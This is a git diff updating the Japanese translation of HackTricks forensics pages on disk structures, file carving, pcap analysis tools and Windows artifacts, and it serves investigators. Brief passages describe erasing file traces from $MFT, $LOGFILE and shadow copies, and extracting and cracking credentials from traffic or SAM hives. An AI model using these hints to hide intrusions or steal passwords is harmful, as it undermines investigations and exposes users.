(0x10) | 4バイト | ヘッダーの[CRC32](https://en.wikipedia.org/wiki/CRC32)(オフセット +0 からヘッダーサイズまで)リトルエンディアンで、このフィールドは計算中にゼロにされます | -| 20 (0x14) | 4バイト | 予約; ゼロでなければなりません | +| 16 (0x10) | 4バイト | ヘッダーの[CRC32](https://en.wikipedia.org/wiki/CRC32)(オフセット +0からヘッダーサイズまで)リトルエンディアンで、このフィールドは計算中にゼロに設定されます | +| 20 (0x14) | 4バイト | 予約; ゼロでなければならない | | 24 (0x18) | 8バイト | 現在のLBA(このヘッダーコピーの位置) | | 32 (0x20) | 8バイト | バックアップLBA(他のヘッダーコピーの位置) | | 40 (0x28) | 8バイト | パーティションのための最初の使用可能LBA(プライマリパーティションテーブルの最後のLBA + 1) | | 48 (0x30) | 8バイト | 最後の使用可能LBA(セカンダリパーティションテーブルの最初のLBA − 1) | -| 56 (0x38) | 16バイト | ディスクGUID(ミックスエンディアン) | +| 56 (0x38) | 16バイト | ディスクGUID(混合エンディアン) | | 72 (0x48) | 8バイト | パーティションエントリの配列の開始LBA(常にプライマリコピーで2) | | 80 (0x50) | 4バイト | 配列内のパーティションエントリの数 | | 84 (0x54) | 4バイト | 単一のパーティションエントリのサイズ(通常は80hまたは128) | -| 88 (0x58) | 4バイト | リトルエンディアンのパーティションエントリ配列のCRC32 | -| 92 (0x5C) | \* | 予約; ブロックの残りの部分はゼロでなければなりません(512バイトのセクターサイズの場合420バイト; ただし、より大きなセクターサイズではより多くなる可能性があります) | +| 88 (0x58) | 4バイト | パーティションエントリ配列のリトルエンディアンでのCRC32 | +| 92 (0x5C) | \* | 予約; ブロックの残りの部分はゼロでなければならない(512バイトのセクターサイズの場合420バイト; ただし、より大きなセクターサイズではより多くなる可能性があります) | **パーティションエントリ (LBA 2–33)** -| GUIDパーティションエントリフォーマット | | | +| GUIDパーティションエントリ形式 | | | | --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- | | オフセット | 長さ | 内容 | -| 0 (0x00) | 16バイト | [パーティションタイプGUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs)(ミックスエンディアン) | -| 16 (0x10) | 16バイト | 一意のパーティションGUID(ミックスエンディアン) | +| 0 (0x00) | 16バイト | [パーティションタイプGUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs)(混合エンディアン) | +| 16 (0x10) | 16バイト | 一意のパーティションGUID(混合エンディアン) | | 32 (0x20) | 8バイト | 最初のLBA([リトルエンディアン](https://en.wikipedia.org/wiki/Little_endian)) | | 40 (0x28) | 8バイト | 最後のLBA(含む、通常は奇数) | | 48 (0x30) | 8バイト | 属性フラグ(例:ビット60は読み取り専用を示す) | @@ -157,7 +157,7 @@ GUIDパーティションテーブル、通称GPTは、MBR(マスターブー - **FAT16**は、16ビットアドレスに拡張され、最大65,517クラスターを収容します。 - **FAT32**は、32ビットアドレスでさらに進化し、ボリュームごとに驚異的な268,435,456クラスターを許可します。 -FATバージョン全体に共通する重要な制限は、**最大ファイルサイズ4GB**であり、これはファイルサイズストレージに使用される32ビットフィールドによって課せられています。 +FATバージョン全体に共通する重要な制限は、**4GBの最大ファイルサイズ**であり、これはファイルサイズストレージに使用される32ビットフィールドによって課せられています。 特にFAT12およびFAT16のルートディレクトリの主要なコンポーネントには以下が含まれます: @@ -191,7 +191,7 @@ FATバージョン全体に共通する重要な制限は、**最大ファイル 前述のように、ファイルが「削除」された後でも、ファイルがまだ保存されている場所がいくつかあります。これは、通常、ファイルシステムからファイルを削除することは単に削除されたとマークするだけで、データは触れられないためです。したがって、ファイルのレジストリ(MFTのような)を検査し、削除されたファイルを見つけることが可能です。 -また、OSは通常、ファイルシステムの変更やバックアップに関する多くの情報を保存しているため、それらを使用してファイルまたはできるだけ多くの情報を回復しようとすることが可能です。 +また、OSは通常、ファイルシステムの変更やバックアップに関する多くの情報を保存しているため、それらを使用してファイルを回復するか、できるだけ多くの情報を回収することが可能です。 {{#ref}} file-data-carving-recovery-tools.md @@ -199,17 +199,17 @@ file-data-carving-recovery-tools.md ### **ファイルカービング** -**ファイルカービング**は、**データの塊の中からファイルを見つけようとする技術**です。このようなツールが機能する主な方法は3つあります:**ファイルタイプのヘッダーとフッターに基づく**、ファイルタイプの**構造に基づく**、および**コンテンツ**自体に基づくものです。 +**ファイルカービング**は、**データの塊の中からファイルを見つけようとする技術**です。このようなツールが機能する主な方法は3つあります:**ファイルタイプのヘッダーとフッターに基づく**、ファイルタイプの**構造に基づく**、および**コンテンツ自体に基づく**。 この技術は**断片化されたファイルを回収するためには機能しない**ことに注意してください。ファイルが**連続したセクターに保存されていない**場合、この技術はそれを見つけることができないか、少なくともその一部を見つけることができません。 -ファイルカービングのために、検索したいファイルタイプを指定するいくつかのツールがあります。 +ファイルカービングに使用できるツールはいくつかあり、検索したいファイルタイプを指定できます。 {{#ref}} file-data-carving-recovery-tools.md {{#endref}} -### データストリーム**C**arving +### データストリーム **C**arving データストリームカービングはファイルカービングに似ていますが、**完全なファイルを探すのではなく、興味深い情報の断片を探します**。\ 例えば、ログされたURLを含む完全なファイルを探すのではなく、この技術はURLを検索します。 @@ -220,8 +220,8 @@ file-data-carving-recovery-tools.md ### セキュア削除 -明らかに、ファイルやそのログの一部を**「安全に」削除する**方法があります。例えば、ファイルの内容をジャンクデータで数回上書きし、その後**$MFT**や**$LOGFILE**からファイルに関する**ログ**を**削除**し、**ボリュームシャドウコピー**を**削除**することが可能です。\ -このアクションを実行しても、**ファイルの存在がまだログされている他の部分があるかもしれない**ことに気付くかもしれません。それは真実であり、フォレンジック専門家の仕事の一部はそれらを見つけることです。 +明らかに、ファイルやそれに関するログの一部を**「安全に」削除する**方法があります。例えば、ファイルの内容をジャンクデータで何度も上書きし、その後**$MFT**や**$LOGFILE**からファイルに関する**ログを削除**し、**ボリュームシャドウコピーを削除**することが可能です。\ +この操作を行っても、**ファイルの存在がまだログされている他の部分があるかもしれない**ことに気付くかもしれませんが、それは真実であり、フォレンジック専門家の仕事の一部はそれらを見つけることです。 ## 参考文献 diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index 1871f7b81..b1f8e7e70 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -2,15 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -> [!NOTE] +> [!TIP] > **PCAP**と**PCAPNG**についての注意: PCAPファイル形式には2つのバージョンがあり、**PCAPNGは新しく、すべてのツールでサポートされているわけではありません**。他のツールで作業するために、Wiresharkや他の互換性のあるツールを使用してPCAPNGからPCAPにファイルを変換する必要があるかもしれません。 ## Online tools for pcaps -- pcapのヘッダーが**壊れている**場合は、次のリンクを使用して**修正**を試みるべきです: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +- あなたのpcapのヘッダーが**壊れている**場合、次のリンクを使用して**修正**を試みるべきです: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) - [**PacketTotal**](https://packettotal.com)でpcap内の**情報**を抽出し、**マルウェア**を検索します。 -- [**www.virustotal.com**](https://www.virustotal.com)および[**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)を使用して**悪意のある活動**を検索します。 -- [**https://apackets.com/**](https://apackets.com/)で**ブラウザからの完全なpcap分析**。 +- [**www.virustotal.com**](https://www.virustotal.com)と[**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)を使用して**悪意のある活動**を検索します。 +- [**https://apackets.com/**](https://apackets.com/)で**ブラウザからの完全なpcap分析**を行います。 ## Extract Information @@ -18,22 +18,23 @@ ### Wireshark -> [!NOTE] -> **PCAPを分析する場合、基本的にWiresharkの使い方を知っておく必要があります** +> [!TIP] +> **PCAPを分析するつもりなら、基本的にWiresharkの使い方を知っておく必要があります** Wiresharkのトリックを見つけることができます: + {{#ref}} wireshark-tricks.md {{#endref}} ### [**https://apackets.com/**](https://apackets.com/) -ブラウザからのpcap分析。 +ブラウザからのPcap分析。 ### Xplico Framework -[**Xplico** ](https://github.com/xplico/xplico)_(Linuxのみ)_は、**pcap**を**分析**し、そこから情報を抽出できます。たとえば、pcapファイルからXplicoは、各メール(POP、IMAP、SMTPプロトコル)、すべてのHTTPコンテンツ、各VoIP通話(SIP)、FTP、TFTPなどを抽出します。 +[**Xplico** ](https://github.com/xplico/xplico)_(Linuxのみ)_は**pcap**を**分析**し、そこから情報を抽出することができます。たとえば、pcapファイルからXplicoは各メール(POP、IMAP、SMTPプロトコル)、すべてのHTTPコンテンツ、各VoIP通話(SIP)、FTP、TFTPなどを抽出します。 **Install** ```bash @@ -53,21 +54,21 @@ _**127.0.0.1:9876**_ に _**xplico:xplico**_ の資格情報でアクセスし ### NetworkMiner -Xplicoと同様に、**pcaps**からオブジェクトを**分析して抽出する**ツールです。無料版があり、[**こちらからダウンロード**](https://www.netresec.com/?page=NetworkMiner)できます。**Windows**で動作します。\ -このツールは、パケットから**他の情報を分析**して、何が起こっていたのかを**より迅速に**把握するのにも役立ちます。 +Xplicoと同様に、**pcapsからオブジェクトを分析および抽出する**ツールです。無料版があり、[**こちらからダウンロード**](https://www.netresec.com/?page=NetworkMiner)できます。**Windows**で動作します。\ +このツールは、パケットから**他の情報を分析**するのにも役立ち、**より迅速**に何が起こっているかを把握することができます。 ### NetWitness Investigator -[**こちらからNetWitness Investigatorをダウンロード**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware)できます。**(Windowsで動作します)**。\ +[**こちらからNetWitness Investigatorをダウンロード**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware)できます**(Windowsで動作します)**。\ これは、パケットを**分析**し、情報を有用な形で整理して、**内部で何が起こっているかを知る**のに役立つ別の便利なツールです。 ### [BruteShark](https://github.com/odedshimon/BruteShark) -- ユーザー名とパスワードを抽出およびエンコード (HTTP, FTP, Telnet, IMAP, SMTP...) -- 認証ハッシュを抽出し、Hashcatを使用してクラックします (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -- ビジュアルネットワークダイアグラムを作成 (ネットワークノードとユーザー) -- DNSクエリを抽出 -- すべてのTCPおよびUDPセッションを再構築 +- ユーザー名とパスワードの抽出とエンコード(HTTP、FTP、Telnet、IMAP、SMTP...) +- 認証ハッシュを抽出し、Hashcatを使用してそれらをクラッキング(Kerberos、NTLM、CRAM-MD5、HTTP-Digest...) +- ビジュアルネットワークダイアグラムの構築(ネットワークノードとユーザー) +- DNSクエリの抽出 +- すべてのTCPおよびUDPセッションの再構築 - ファイルカービング ### Capinfos @@ -76,7 +77,7 @@ capinfos capture.pcap ``` ### Ngrep -pcap内で**何か**を**探している**場合は、**ngrep**を使用できます。以下は主要なフィルターを使用した例です: +pcap内で**何か**を**探している**場合は、**ngrep**を使用できます。以下は主要なフィルターを使用した例です: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` @@ -109,12 +110,12 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) は、次のことができるツールです。 +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) は、次の機能を持つツールです。 - PCAPファイルを読み取り、Httpストリームを抽出します。 - gzipは圧縮されたストリームを解凍します。 - すべてのファイルをyaraでスキャンします。 -- report.txtを書き込みます。 +- report.txtを作成します。 - 一致するファイルをディレクトリに保存するオプションがあります。 ### Malware Analysis @@ -129,7 +130,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log > [Zeek](https://docs.zeek.org/en/master/about.html) は、受動的なオープンソースのネットワークトラフィックアナライザーです。多くのオペレーターは、疑わしいまたは悪意のある活動の調査をサポートするために、Zeekをネットワークセキュリティモニター(NSM)として使用しています。Zeekは、セキュリティドメインを超えたパフォーマンス測定やトラブルシューティングを含む、幅広いトラフィック分析タスクもサポートしています。 -基本的に、`zeek`によって作成されたログは**pcap**ではありません。したがって、**pcap**に関する**情報**を分析するために、**他のツール**を使用する必要があります。 +基本的に、`zeek`によって作成されたログは**pcaps**ではありません。したがって、**pcaps**に関する**情報**を分析するために**他のツール**を使用する必要があります。 ### Connections Info ```bash @@ -200,14 +201,17 @@ rita show-exploded-dns -H --limit 10 zeek_logs ``` ## 他のpcap分析のトリック + {{#ref}} dnscat-exfiltration.md {{#endref}} + {{#ref}} wifi-pcap-analysis.md {{#endref}} + {{#ref}} usb-keystrokes.md {{#endref}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 1071edf26..fbabeab88 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,6 +1,8 @@ +# 特定のソフトウェア/ファイルタイプのトリック + {{#include ../../../banners/hacktricks-training.md}} -ここでは、特定のファイルタイプやソフトウェアに関する興味深いトリックを見つけることができます: +ここでは、特定のファイルタイプおよび/またはソフトウェアに関する興味深いトリックを見つけることができます: {{#ref}} .pyc.md diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index eff3f4efd..f598b1f23 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md @@ -14,25 +14,25 @@ Timeline は、訪問したウェブページ、編集した文書、実行したアプリケーションの **時系列履歴** を提供する Windows の特徴です。 -データベースは、パス `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db` にあります。このデータベースは、SQLite ツールまたはツール [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) を使用して開くことができ、**このツールで生成された 2 つのファイルは、ツール** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **で開くことができます**。 +データベースは、パス `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db` にあります。このデータベースは、SQLite ツールまたはツール [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) を使用して開くことができ、**2つのファイルを生成し、それらはツール** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **で開くことができます**。 ### ADS (Alternate Data Streams) -ダウンロードされたファイルには、**ADS Zone.Identifier** が含まれており、**どのように** intranet、internet などから **ダウンロードされたか** を示しています。一部のソフトウェア(ブラウザなど)は、ファイルがダウンロードされた **URL** など、さらに **多くの情報** を提供することがよくあります。 +ダウンロードされたファイルには、**ADS Zone.Identifier** が含まれており、**どのように** intranet、internet などから **ダウンロードされたか** を示しています。一部のソフトウェア(ブラウザなど)は、ファイルがダウンロードされた**URL**など、さらに**多くの情報**を提供することがよくあります。 ## **File Backups** ### Recycle Bin Vista/Win7/Win8/Win10 では、**Recycle Bin** はドライブのルートにあるフォルダー **`$Recycle.bin`** にあります(`C:\$Recycle.bin`)。\ -このフォルダーでファイルが削除されると、2 つの特定のファイルが作成されます: +このフォルダー内でファイルが削除されると、2つの特定のファイルが作成されます: - `$I{id}`: ファイル情報(削除された日時) - `$R{id}`: ファイルの内容 ![](<../../../images/image (1029).png>) -これらのファイルがあれば、ツール [**Rifiuti**](https://github.com/abelcheung/rifiuti2) を使用して、削除されたファイルの元のアドレスと削除された日時を取得できます(Vista – Win10 には `rifiuti-vista.exe` を使用)。 +これらのファイルがあれば、ツール [**Rifiuti**](https://github.com/abelcheung/rifiuti2) を使用して削除されたファイルの元のアドレスと削除日時を取得できます(Vista – Win10 には `rifiuti-vista.exe` を使用)。 ``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` @@ -40,7 +40,7 @@ Vista/Win7/Win8/Win10 では、**Recycle Bin** はドライブのルートにあ ### ボリュームシャドウコピー -シャドウコピーは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これらは使用中であっても可能です。 +シャドウコピーは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これらは使用中であっても作成可能です。 これらのバックアップは通常、ファイルシステムのルートから` \System Volume Information`にあり、名前は以下の画像に示されている**UID**で構成されています。 @@ -54,7 +54,7 @@ Vista/Win7/Win8/Win10 では、**Recycle Bin** はドライブのルートにあ ![](<../../../images/image (254).png>) -レジストリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`にも、`ボリュームシャドウコピー`に関する構成情報が含まれています。 +レジストリ`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`には、`ボリュームシャドウコピー`に関する構成情報も含まれています。 ### Office自動保存ファイル @@ -66,12 +66,12 @@ Officeの自動保存ファイルは次の場所にあります: `C:\Usuarios\\A ### 最近の文書 (LNK) -Windowsは、ユーザーが次の場所で**ファイルを開く、使用する、または作成する**と、これらの**ショートカット**を**自動的に****作成**します: +Windowsは、ユーザーが次の場所で**ファイルを開く、使用する、または作成する**ときに、これらの**ショートカット**を**自動的に****作成**します: - Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` - Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -フォルダーが作成されると、フォルダーへのリンク、親フォルダー、および祖父フォルダーへのリンクも作成されます。 +フォルダーが作成されると、フォルダーへのリンク、親フォルダーへのリンク、および祖父フォルダーへのリンクも作成されます。 これらの自動的に作成されたリンクファイルは、**ファイル**か**フォルダー**か、**MAC** **タイム**、**ボリューム情報**、および**ターゲットファイルのフォルダー**に関する情報を**含んでいます**。この情報は、ファイルが削除された場合にそれらを回復するのに役立ちます。 @@ -100,11 +100,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ### ジャンプリスト -これらはアプリケーションごとに示される最近のファイルです。各アプリケーションでアクセスできる**アプリケーションによって使用された最近のファイルのリスト**です。これらは**自動的に作成されるか、カスタム**で作成されることがあります。 +これはアプリケーションごとに示される最近のファイルです。各アプリケーションでアクセスできる**アプリケーションによって使用された最近のファイルのリスト**です。これらは**自動的に作成されるか、カスタム**で作成されることがあります。 自動的に作成された**ジャンプリスト**は、`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`に保存されます。ジャンプリストは、最初のIDがアプリケーションのIDである`{id}.autmaticDestinations-ms`という形式で命名されます。 -カスタムジャンプリストは、`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`に保存され、通常はファイルに**重要な**ことが起こったためにアプリケーションによって作成されます(お気に入りとしてマークされたかもしれません)。 +カスタムジャンプリストは、`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`に保存され、通常はファイルに**重要な**ことが起こったためにアプリケーションによって作成されます(お気に入りとしてマークされているかもしれません)。 任意のジャンプリストの**作成時間**は、**ファイルが最初にアクセスされた時間**を示し、**修正時間は最後にアクセスされた時間**を示します。 @@ -144,13 +144,13 @@ USB接続が行われた時刻に関するタイムスタンプを取得する ### USB Detective -[**USBDetective**](https://usbdetective.com)を使用して、画像に接続されたUSBデバイスに関する情報を取得できます。 +[**USBDetective**](https://usbdetective.com)は、画像に接続されたUSBデバイスに関する情報を取得するために使用できます。 ![](<../../../images/image (452).png>) ### プラグアンドプレイのクリーンアップ -「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、主に古いドライバーバージョンの削除を目的としています。最新のドライバーパッケージバージョンを保持するという指定された目的に反して、オンラインソースは、過去30日間に非アクティブなドライバーも対象にしていることを示唆しています。したがって、過去30日間に接続されていないリムーバブルデバイスのドライバーは削除される可能性があります。 +「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、主に古いドライバーバージョンの削除を目的としています。最新のドライバーパッケージバージョンを保持するという指定された目的とは対照的に、オンラインソースは、過去30日間に非アクティブなドライバーも対象にしていることを示唆しています。したがって、過去30日間に接続されていないリムーバブルデバイスのドライバーは削除される可能性があります。 タスクは次のパスにあります:`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`。 @@ -164,9 +164,9 @@ USB接続が行われた時刻に関するタイムスタンプを取得する - **Period ('P1M')**:タスクスケジューラに、定期的な自動メンテナンス中に毎月クリーンアップタスクを開始するよう指示します。 - **Deadline ('P2M')**:タスクスケジューラに、タスクが2か月連続で失敗した場合、緊急自動メンテナンス中にタスクを実行するよう指示します。 -この構成により、ドライバーの定期的なメンテナンスとクリーンアップが確保され、連続して失敗した場合のタスクの再試行のための規定が設けられています。 +この構成により、ドライバーの定期的なメンテナンスとクリーンアップが確保され、連続的な失敗が発生した場合にタスクを再試行するための規定が設けられています。 -**詳細については次を確認してください:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**詳細については、次を確認してください:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) ## メール @@ -181,11 +181,11 @@ USB接続が行われた時刻に関するタイムスタンプを取得する ### Windowsメールアプリ -このアプリケーションは、メールをHTMLまたはテキストで保存します。メールは`Users\\AppData\Local\Comms\Unistore\data\3\`内のサブフォルダーにあります。メールは`.dat`拡張子で保存されます。 +このアプリケーションは、メールをHTMLまたはテキスト形式で保存します。メールは、`\Users\\AppData\Local\Comms\Unistore\data\3\`内のサブフォルダーにあります。メールは`.dat`拡張子で保存されます。 メールの**メタデータ**と**連絡先**は、**EDBデータベース**内にあります:`\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -ファイルの拡張子を`.vol`から`.edb`に変更すると、[ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)ツールを使用して開くことができます。`Message`テーブル内でメールを見ることができます。 +ファイルの拡張子を`.vol`から`.edb`に変更すると、ツール[**ESEDatabaseView**](https://www.nirsoft.net/utils/ese_database_view.html)を使用して開くことができます。`Message`テーブル内でメールを見ることができます。 ### Microsoft Outlook @@ -203,7 +203,7 @@ Microsoft Outlookクライアントでは、送信/受信されたすべての レジストリパス`HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook`は、使用されているファイルを示しています。 -PSTファイルは、[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)ツールを使用して開くことができます。 +PSTファイルは、ツール[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)を使用して開くことができます。 ![](<../../../images/image (498).png>) @@ -234,7 +234,7 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ - `%windir%\System32\Config`は、さまざまな`HKEY_LOCAL_MACHINE`サブキー用です。 - `%UserProfile%{User}\NTUSER.DAT`は、`HKEY_CURRENT_USER`用です。 -- Windows Vista以降のバージョンは、`HKEY_LOCAL_MACHINE`レジストリファイルを`%Windir%\System32\Config\RegBack\`にバックアップします。 +- Windows Vista以降のバージョンは、`%Windir%\System32\Config\RegBack\`に`HKEY_LOCAL_MACHINE`レジストリファイルのバックアップを保存します。 - さらに、プログラム実行情報は、Windows VistaおよびWindows 2008 Server以降の`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`に保存されます。 ### ツール @@ -242,9 +242,9 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ レジストリファイルを分析するために役立つツールがいくつかあります: - **レジストリエディタ**:Windowsにインストールされています。現在のセッションのWindowsレジストリをナビゲートするためのGUIです。 -- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md):レジストリファイルをロードし、GUIでナビゲートすることができます。また、興味深い情報を持つキーをハイライトするブックマークも含まれています。 -- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):再び、ロードされたレジストリをナビゲートするためのGUIがあり、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。 -- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html):レジストリから重要な情報を抽出できる別のGUIアプリケーションです。 +- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md):レジストリファイルをロードし、GUIでナビゲートすることを可能にします。また、興味深い情報を持つキーをハイライトするブックマークも含まれています。 +- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):再び、ロードされたレジストリをナビゲートするためのGUIを持ち、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。 +- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html):レジストリから重要な情報を抽出することができる別のGUIアプリケーションです。 ### 削除された要素の回復 @@ -252,16 +252,17 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ ### 最終書き込み時間 -各キー-値には、最後に変更された時間を示す**タイムスタンプ**が含まれています。 +各キー-値には、最後に修正された時間を示す**タイムスタンプ**が含まれています。 ### SAM ファイル/ハイブ**SAM**には、システムの**ユーザー、グループ、およびユーザーパスワード**のハッシュが含まれています。 -`SAM\Domains\Account\Users`内で、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、およびアカウントが作成された日時を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も**必要**です。 +`SAM\Domains\Account\Users`で、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、およびアカウントが作成された時期を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も**必要**です。 ### Windowsレジストリの興味深いエントリ + {{#ref}} interesting-windows-registry-keys.md {{#endref}} @@ -284,13 +285,13 @@ interesting-windows-registry-keys.md プリフェッチは、コンピュータがユーザーが**近い将来にアクセスする可能性のあるコンテンツを表示するために必要なリソースを静かに取得する**ことを可能にする技術です。これにより、リソースに迅速にアクセスできます。 -Windowsプリフェッチは、**実行されたプログラムのキャッシュを作成**して、より速くロードできるようにします。これらのキャッシュは、`C:\Windows\Prefetch`内に`.pf`ファイルとして作成されます。XP/VISTA/WIN7では128ファイル、Win8/Win10では1024ファイルの制限があります。 +Windowsプリフェッチは、**実行されたプログラムのキャッシュを作成**して、より速くロードできるようにします。これらのキャッシュは、次のパス内に`.pf`ファイルとして作成されます:`C:\Windows\Prefetch`。XP/VISTA/WIN7では128ファイル、Win8/Win10では1024ファイルの制限があります。 ファイル名は`{program_name}-{hash}.pf`として作成されます(ハッシュは実行可能ファイルのパスと引数に基づいています)。W10では、これらのファイルは圧縮されています。ファイルの存在は、**プログラムが実行された**ことを示しています。 -ファイル`C:\Windows\Prefetch\Layout.ini`には、**プリフェッチされたファイルのフォルダーの名前**が含まれています。このファイルには、**実行回数**、**実行日**、および**プログラムによって開かれたファイル**に関する情報が含まれています。 +ファイル`C:\Windows\Prefetch\Layout.ini`には、**プリフェッチされたファイルのフォルダーの名前**が含まれています。このファイルには、**実行回数**、**実行日**、および**プログラムによって**開かれた**ファイルに関する情報が含まれています。 -これらのファイルを調査するには、[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)ツールを使用できます。 +これらのファイルを調査するには、ツール[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)を使用できます。 ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` @@ -298,7 +299,7 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ ### Superprefetch -**Superprefetch**は、次に読み込まれるものを予測することによって**プログラムをより速く読み込む**という同じ目的を持っています。しかし、これはプリフェッチサービスの代わりにはなりません。\ +**Superprefetch**は、次に読み込まれるものを予測することによって**プログラムをより速く読み込む**という同じ目的を持っています。しかし、これはprefetchサービスの代わりにはなりません。\ このサービスは、`C:\Windows\Prefetch\Ag*.db`にデータベースファイルを生成します。 これらのデータベースには、**プログラム**の**名前**、**実行回数**、**開かれたファイル**、**アクセスされたボリューム**、**完全なパス**、**時間枠**、および**タイムスタンプ**が含まれています。 @@ -313,8 +314,8 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ - AppIDとパス - プロセスを実行したユーザー -- 送信バイト数 -- 受信バイト数 +- 送信バイト +- 受信バイト - ネットワークインターフェース - 接続の持続時間 - プロセスの持続時間 @@ -348,7 +349,7 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ **Amcache.hve** ファイルは、システム上で実行されたアプリケーションの詳細を記録するレジストリハイブです。通常、`C:\Windows\AppCompat\Programas\Amcache.hve` にあります。 -このファイルは、実行されたプロセスの記録を保存することで注目されており、実行可能ファイルへのパスやその SHA1 ハッシュを含んでいます。この情報は、システム上のアプリケーションの活動を追跡するために非常に貴重です。 +このファイルは、最近実行されたプロセスの記録を保存しており、実行可能ファイルへのパスやその SHA1 ハッシュを含んでいます。この情報は、システム上のアプリケーションの活動を追跡するために非常に貴重です。 **Amcache.hve** からデータを抽出して分析するには、[**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) ツールを使用できます。以下のコマンドは、AmcacheParser を使用して **Amcache.hve** ファイルの内容を解析し、結果を CSV 形式で出力する方法の例です。 ```bash @@ -366,7 +367,7 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ### スケジュールされたタスク -これらは`C:\Windows\Tasks`または`C:\Windows\System32\Tasks`から抽出でき、XMLとして読むことができます。 +これらは`C:\Windows\Tasks`または`C:\Windows\System32\Tasks`から抽出でき、XMLとして読み取ることができます。 ### サービス @@ -382,7 +383,7 @@ 